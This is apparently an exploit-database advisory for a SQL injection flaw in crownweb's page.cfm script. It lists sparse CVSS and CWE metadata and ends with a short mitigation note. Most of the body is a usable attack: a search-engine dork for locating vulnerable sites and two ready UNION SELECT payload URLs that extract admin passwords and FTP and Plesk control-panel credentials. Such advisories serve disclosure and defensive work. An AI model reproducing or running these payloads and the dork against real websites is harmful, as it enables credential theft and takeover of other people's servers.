vendor:
crownweb
by:
F.Hack
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: crownweb
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: crownweb
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
crownweb (page.cfm) Sql Injection Vulnerability
An attacker can exploit a SQL injection vulnerability in the crownweb page.cfm script to gain access to the webadmin and Plesk control panel credentials. The attacker can use the Dork “Powered By CrownWeb.net!” inurl:”page.cfm” to find vulnerable websites. The attacker can then use the SQL injection payloads www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author and www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata to gain access to the webadmin and Plesk control panel credentials respectively.
Mitigation:
Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious data from being entered into the system.